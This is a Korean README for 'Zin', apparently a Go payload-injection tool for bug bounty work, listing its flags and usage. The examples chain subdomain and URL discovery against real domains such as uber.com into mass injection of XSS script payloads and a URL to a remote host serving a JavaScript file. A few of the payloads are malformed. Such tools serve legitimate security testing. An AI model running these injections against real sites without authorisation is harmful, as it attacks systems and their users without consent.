
버그 바운티를 위한 Go로 작성된 페이로드 인젝터
버그바운티를 위한 페이로드 인젝터, Go로 작성됨
$ go get -u github.com/ethicalhackingplayground/Zin
-✅ 응답에서 패턴 매칭
-✅ 상태 코드 매칭
_
(_)
_____ _ __
|_ / | '_ \
/ /| | | | |
/___|_|_| |_|
바운티가 오기를
-c int
동시성 (기본값: 20)
-g string
응답에서 일치 항목 검색
-p string
사용할 페이로드
-pL string
사용할 페이로드 목록
-s int
상태 코드로 필터링 (기본값: 200)
$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"
$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"
$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>
$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>
$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"
$ cat hosts | gau | Zin -c 80 -p <payload>
바운티를 받으셨다면 커피 한 잔으로 지원해주세요
